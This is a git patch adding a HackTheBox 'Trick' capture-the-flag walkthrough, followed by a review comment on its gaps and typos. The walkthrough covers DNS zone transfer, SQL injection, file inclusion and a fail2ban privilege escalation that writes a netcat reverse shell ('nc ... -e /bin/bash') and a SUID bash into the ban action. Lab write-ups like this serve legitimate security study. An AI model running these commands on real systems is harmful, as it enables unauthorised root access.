From abb5fb0b01908ff6c2e500104f210943814c81aa Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Fri, 10 Feb 2023 17:31:39 +0300 Subject: [PATCH] Create Trick.md --- HackTheBox/Trick.md | 181 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 181 insertions(+) create mode 100644 HackTheBox/Trick.md diff --git a/HackTheBox/Trick.md b/HackTheBox/Trick.md new file mode 100644 index 0000000..685d583 --- /dev/null +++ b/HackTheBox/Trick.md 
@@ -0,0 +1,181 @@ +# HackThBox - Trick + +## NMAP + +```bash +Nmap scan report for 10.129.85.201 +Host is up (0.15s latency). +Not shown: 65531 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) +| ssh-hostkey: +| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA) +| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA) +|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519) +25/tcp open smtp? +|_smtp-commands: Couldn't establish connection on port 25 +53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux) +| dns-nsid: +|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian +80/tcp open http nginx 1.14.2 +|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA +| http-methods: +|_ Supported Methods: GET HEAD +|_http-server-header: nginx/1.14.2 +|_http-title: Coming Soon - Start Bootstrap Theme +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +``` + +## PORT 80 (HTTP) + +On the web page we see a bootstrap template which has nothing intersting + + + +Fuzzing for files and directories it didn't found anything as well + + + +## PORT 53 (DNS) + +Having dns service running we can try to see if we can query dns records or perform dns zone transfer for that we need a domain name, we can get the domain by performing a reverse dns lookup which resolve IP to domain name + +https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns + +`dig -x 10.10.11.166 @10.10.11.166` + + + +Having the `trick.htb` we can add this in hosts file + + + +Now to enumerate further we can perform the dns zone transfer + + + +This shows `root.trick.htb` subdomain but it doesn't take us anywhere, on performing zone transfer with `axfr` + + + +We get another domain name `preprod-payroll.trick.htb`, so let's add this in hosts file as well + + + +Visting this subdomain, we'll get a login page on which we can try default credentials + + + + + +Which didn't worked, so next I tried sqli + + + 
+That worked, so I tried running `sqlmap` but `time-based blind` so it's gonna take a lot of time in dumping the data + + + + +## Foothold + +Going back to the site we can see a GET parameter `page` fetching for pages, I tried to perform LFI on that parameter but it didn't worked + +I tried running `wfuzz` against the parameter using LFI wordlist + + + + + +Which didn't worked but the web app had sql injection in ton of places, on viewing employee details intercepting the request, we'll get a GET parameter `id` which also is vulnerable to sqli + + + + + + + +It shows that it's boolean-blind as on the login page it was a time based sqli so with this we can perform LFI to read nginx vhost configuration file + + + +This shows another subdomain `preprod-marketing.trick.htb` + + + +Alternatively we can enumerate this subdomain by running wfuzz + + + + + +This loads up another site, having nothing special other than the same GET parameter, so I tried running LFI wordlist here as well + + + + + +This starts to give us some output on filterting the response + + + +We have the username `michael` , we can try to see if we can access his .ssh folder for `id_rsa` + + + + + +## Privilege Escalation + +Running `sudo -l` to check if we can run with sudo privileges + + + +So we can restart the `fail2ban` service but we don't know exaclty what we need to edit, being in security group we can check what permissions this group has + + + +We have write access to this folder which has configuration files for fail2ban + + + +I found an article explaining how we can abuse fail2ban config file + +https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7 + +For this we need to edit the `actionban` command in `iptables-multiport.conf`, so first let's copy this file in /tmp or other directory where we can edit it with a reverse shell + +```bash +/usr/bin/nc 10.10.14.39 2222 -e /bin/bash +``` + + + +After editing the config file, move it 
back to the action.d folder and restart fail2ban service + + + +Then start doing fail attempts on login, you'll get a reverse shell on your port + + + +But our reverse shell connection dies and the reason behind this is, the ban duration lasts for 10 seconds and bans the host after the 5th attempt + + + +Instead of getting a reverse shell we can just make bash a SUID with `chmod +s /bin/bash` + + + +Performing the invalid login attempts on ssh will trigger the fail2ban on the 5th invalid attempt + + + + + + +## References + +- https://book.hacktricks.xyz/network-services-pentesting/pentesting-dns +- https://youssef-ichioui.medium.com/abusing-fail2ban-misconfiguration-to-escalate-privileges-on-linux-826ad0cdafb7
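Review bot: Most of the evidence this write-up relies on is missing from the hunk: the runs of blank lines after "Fuzzing for files and directories", "dig -x 10.10.11.166 @10.10.11.166", "Running `sudo -l`" and "We have write access to this folder" read as dropped image embeds, so the zone-transfer result, the `sudo -l` output and the `security` group's permissions are asserted but not shown; either add the screenshots or paste the terminal output in fenced blocks like the nmap section does. The addresses are also inconsistent: the nmap report is for 10.129.85.201 while the dig command and the `/usr/bin/nc 10.10.14.39 2222 -e /bin/bash` line use 10.10.11.166 and 10.10.14.39, so state which is the target and which is the listener host (or use a placeholder for the latter). Spelling: "HackThBox" in the title, "intersting", "Visting", "filterting", "exaclty", and "didn't worked" (three occurrences) should be "didn't work". Finally, the privilege-escalation section would benefit from one sentence naming the underlying misconfiguration for readers: a non-root group with write access to the fail2ban `action.d` directory plus sudo rights to restart the service, with the fix being root-only ownership of that directory and no sudo on the restart.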